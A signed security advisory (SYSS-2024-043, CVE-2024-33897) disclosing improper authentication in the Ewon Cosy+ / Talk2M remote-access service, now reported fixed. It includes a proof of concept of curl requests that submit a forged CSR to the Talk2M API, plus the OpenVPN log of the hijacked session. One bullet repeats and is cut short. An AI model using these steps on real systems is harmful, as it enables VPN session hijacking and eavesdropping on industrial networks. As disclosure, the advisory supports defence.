Headline
Ewon Cosy+ / Talk2M Remote Access Solution Improper Authentication
During account assignment in the Talk2M platform, a Cosy+ device generates and sends a certificate signing request (CSR) to the back end. This CSR is then signed by the manufacturer and used for OpenVPN authentication by the device afterward. Since the common name (CN) of the certificate is specified by the device and used in order to assign the OpenVPN session to the corresponding Talk2M account, an attacker with root access to a Cosy+ device is able to manipulate the CSR and get correctly signed certificates for foreign devices.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2024-043
Product: Ewon Cosy+ / Talk2M Remote Access Solution
Manufacturer: HMS Industrial Networks AB
Affected Version(s): N.A.
Tested Version(s): N.A.
Vulnerability Type: Improper Authentication (CWE-287)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2024-04-17
Solution Date: 2024-04-18
Public Disclosure: 2024-08-11
CVE Reference: CVE-2024-33897
Author of Advisory: Moritz Abrell, SySS GmbH
Overview:
The Ewon Cosy+ is a VPN gateway used for remote access and maintenance
in industrial environments.
The manufacturer describes the product as follows (see [1]):
"The Ewon Cosy+ gateway establishes a secure VPN connection between
the machine (PLC, HMI, or other devices) and the remote engineer.
The connection happens through Talk2m, a highly secured industrial
cloud service. The Ewon Cosy+ makes industrial remote access easy
and secure like never before!"
Vulnerability Details:
During account assignment in the Talk2M platform, a Cosy+ device
generates and sends a certificate signing request (CSR) to the back end.
This CSR is then signed by the manufacturer and used for OpenVPN
authentication by the device afterward.
Since the common name (CN) of the certificate is specified by the device
and used in order to assign the OpenVPN session to the corresponding
Talk2M account, an attacker with root access to a Cosy+ device is able
to manipulate the CSR and get correctly signed certificates for foreign
devices.
Using these certificates for OpenVPN authentication results in hijacking
the VPN session and allows for further attacks, e.g.:
- Impacting the accessibility of the original device
- Attacking the Talk2M-connected user device via the VPN connection
- Eavesdropping and manipulating the network communication of connected
users
- Eavesdropping and manipulating the network communication of connected
Proof of Concept (PoC):
Note: Since the X.509 client certificate of a Cosy+, which is used for
authentication against the Talk2M API, is handled by the hardware
security module (HSM), root access to a Cosy+ device is required.
1. Exporting the OpenSSL engine to use the hardware security module:
$ export OPENSSL_CONF=/etc/ssl/se050_openssl.cnf
$ export EX_SSS_BOOT_SSS_PORT=/dev/i2c-0
2. Sending a self-created CSR to the Talk2M API:
$ curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: eu.device.talk2m.com' -H $'Accept: application/json' \
-H $'Content-Type: application/json' -H $'Ewon-Serial: 2403-0999-25' \
-H $'Device-State: AccountLinked' -H $'Content-Length: 768' \
--data-binary $'{\x0a\x09\"csr\":
\x09\"-----BEGIN CERTIFICATE REQUEST-----\\nMIIB6zCCAUwCAQAwgaY
xCzAJBgNVBAYTAkJFMRcwFQYDVQQIEw5CcmFiYW50IFdh\\nbGxvbjERMA8GA1U
EBxMITml2ZWxsZXMxIzAhBgNVBAoTGkhNUyBJbmR1c3RyaWFs\\nIE5ldHdvcmt
zIFNBMRAwDgYDVQQLEwdFd29uIEJVMRYwFAYDVQQDEw1EMjMwNy0w\\nMTAxLTI
1MRwwGgYJKoZIhvcNAQkBFg1pbmZvQGV3b24uYml6MIGbMBAGByqGSM49\\nAgE
GBSuBBAAjA4GGAAQBaUGPo1FIjOOqyd1M47M2fcLQ2MN3aj7wI8pBYmopdSEY\\
nKszktBPre3AZ74E4326+vUej6nBG/17SWNb+VZPEyXYBAvEyyvsXfy/UlnB6NX
aj\\n6rrmy2pqP5bKN/1yR3reqlA6+9rdYzcH3ESJvp9hTkZnV4qbdNjTtqSfZO
4zu1Zn\\nE+CgADAKBggqhkjOPQQDAgOBjAAwgYgCQgDVbJN5MJJZnkRRvNwwXu
6GrvILBN6H\\nxTwR3inwMxLf+a/o+SFiqq5Pvsm2UXebVSD3osopdnJ8cxzTzi
PopsLiXAJCAa5K\\n+0T0H8VAvBzKTQkpiHHzW9JkDvIDaJA4WtYzA+KT7jo4kW
vQIr7rBBOlILoofQzv\\nypCqHaugjHhdeuJecIiq\\n-----END CERTIFICAT
E REQUEST-----\\n\"\x0a}' \
$'https://eu.device.talk2m.com/certificates/csr' \
--cert /tmp/birth_key_crt.pem --key /tmp/birth_key_ref.pem
3. Requesting the signed certificate:
$ curl -i -k -H $'Device-State: AccountLinked' \
https://device.talk2m.com/certificates/deviceCertificate \
--cert birth_key_crt.pem --key birth_key_ref.pem
4. Talk2M response:
HTTP/1.1 200
date: Tue, 16 Apr 2024 13:09:57 GMT
server: Apache
ewon-server-time: 1713272998
device-state: VpnProvisioned
content-type: application/json
transfer-encoding: chunked
{"certificate":"-----BEGIN CERTIFICATE-----\nMIIDTjCCAjagAwIBA[...]
KsxyR8w==\n-----END CERTIFICATE-----"}
5. This signed certificate and the used key can be used for OpenVPN
authentication. The CN will be used to assign the session to the
corresponding Talk2M account. This also overwrites a potential
current VPN session of the original device:
$ openvpn --config attacker.ovpn
Attempting to establish TCP connection with [AF_INET]51.195.79.69:443
TCP connection established with [AF_INET]51.195.79.69:443
TCPv4_CLIENT link remote: [AF_INET]51.195.79.69:443
VERIFY OK: depth=1, C=BE, ST=Brabant Wallon, L=Nivelles, O=eWON sa,
OU=Talk2M, CN=Talk2M Certification Authority,
[email protected]
VERIFY KU OK
Validating certificate extended key usage
++ Certificate has EKU (str) TLS Web Server Authentication,
expects TLS Web Server Authentication
VERIFY EKU OK
VERIFY OK: depth=0, C=BE, ST=Brabant Wallon, L=Nivelles,
O=HMS Industrial Networks SA, OU=Talk2M, CN=server-device,
[email protected]
Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384,
peer certificate: 2048 bit RSA, signature: RSA-SHA1
[server-device] Peer Connection Initiated with [AF_INET]51.195.79.69:443
TUN/TAP device tap0 opened
net_addr_ll_set: lladdr 00:03:27:d8:68:84 for tap0
TUN/TAP link layer address set to 00:03:27:d8:68:84
net_iface_mtu_set: mtu 1500 for tap0
net_iface_up: set tap0 up
net_addr_v4_add: 10.37.211.214/16 dev tap0
Data Channel: cipher 'AES-256-GCM', peer-id: 0, compression: 'lzo'
Timers: ping 10, ping-exit 40
Initialization Sequence Completed
Solution:
The vulnerability was fixed in the back end by HMS on April 18, 2024.
Disclosure Timeline:
2024-04-09: Potential vulnerability discovered
2024-04-16: Call with the manufacturer and requested a Talk2M account
with an assigned device to verify the potential vulnerability
2024-04-16: Manufacturer provided a Talk2M account with an assigned device
2024-04-16: Vulnerability confirmed
2024-04-16: Short update about the state sent to the manufacturer
2024-04-16: Security advisory inculding technical details provided to
the manufacturer
2024-04-18: Vulnerability fixed by the manufacturer
2024-04-30: CVE ID CVE-2024-33897[5] assigned by the manufacturer
2024-07-12: Manufacturer asked for reviewing the blog post draft
2024-07-12: Confirmed reviewing the blog post is possible and asking for
the sending of details
2024-07-17: Blog post provided to HMS
2024-07-23: Inquiry about the status
2024-07-23: Manufacturer reviewed the blog post
2024-07-24: Manufacturer also asked for an appointment to discuss the blog post
2024-07-29: Discussion with HMS about the blog post and final publication
actions
2024-08-11: Vulnerability disclosed at DEF CON[7]
2024-08-11: Blog post published[6]
References:
[1] Ewon Cosy+ product website
https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet
[2] SySS Security Advisory SYSS-2024-043
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-043.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
[4] Manufacturer note
https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001–ewon-several-cosy–vulnerabilities.pdf
[5] CVE-2024-33897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33897
[6] Blog post
https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/
[7] DEF CON talk
https://defcon.org/html/defcon-32/dc-32-speakers.html#54521
Credits:
This security vulnerability was found by Moritz Abrell of SySS GmbH.
E-Mail:[email protected]
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53
Disclaimer:
The information provided in this security advisory is provided “as is”
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL:http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay47wACgkQrgyb+PE0
i1O5RQ/9HM9YIPRLVqGSRNPYW45F9e1wj9uHTvt78XjRng5lbRPpgWAO1G6UVQvS
ebugxzjAtGrdMxx8X1NHd9vbshyAHj/q33Y0fkQ5TB2hnSMkn2nbXTEZKIIS6wK0
XnJhB31iVnkgMeNFQ0SwSutBnnxJ7mvQ6vUBG210DSHjpQtu8rWuCyrf3BcSCJ/I
nT79b7TJOxOMD1y5VAeVP6Pehh+IlJgvSItXZyOjs4wgt/+z+wVoKnYdqSAHpovI
/rjVbtp7cvIhQInghnDoRWfXce34bk07geOB4VGg7bhxGCeWbJZq/Dxrag5jJb9l
0zx2K4M8ZTwFcrtAliFgyzrIgvjfOk9HCZasSMl20znj4+3QaAWpfn2oMmCQCaLg
6hBqAQ+s66Cv8Br24WKdlnj3nrsn+SAX2TKDxajt+WiDkXKvsLPs8XCmzVN8jViK
nN/dJ3chba4yhqmpft1wRXG71VvBdbv3pkLp7usKszUrul8M802JzF2aGTUsiKgQ
QSxpNhSP4aC2jqjt1OpX7W6NKD1nIhg0VrduxlwlAcQ2uffbh8xtak1MgZry0/yP
6j9a15DOTJshMeud8R3Bkfjms/0Jzm43uyjIeRGNP79UyohsTX4jOJAsUYr0efUZ
/55N3HiCD94jYoee5E3sF1vWlrhVDzkWJ7Q8u/W4osSIwMNikTc=
=JS3w
-----END PGP SIGNATURE-----